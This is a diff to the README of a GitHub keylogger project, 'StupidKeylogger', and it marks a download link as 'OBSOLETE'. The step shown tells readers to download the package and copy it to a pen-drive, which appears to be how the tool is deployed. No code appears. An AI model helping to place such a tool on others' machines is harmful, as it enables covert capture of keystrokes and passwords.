PhantomGhosts/StupidKeylogger/README.md

 ### How to use?

-1. Download the full package from [here](https://github.com/MinhasKamal/StupidKeylogger/archive/application.zip), unzip it, and move it to your pen-drive.
+1. Download the full package from OBSOLETE [here](https://github.com/MinhasKamal/StupidKeylogger/archive/application.zip), unzip it, and move it to your pen-drive.
 It should look something like this-

  <div align="center">
    <img src="https://cloud.githubusercontent.com/assets/5456665/18231884/984f4d58-72e5-11e6-8401-725c6906c040.PNG" alt="StupidKeylogger"/>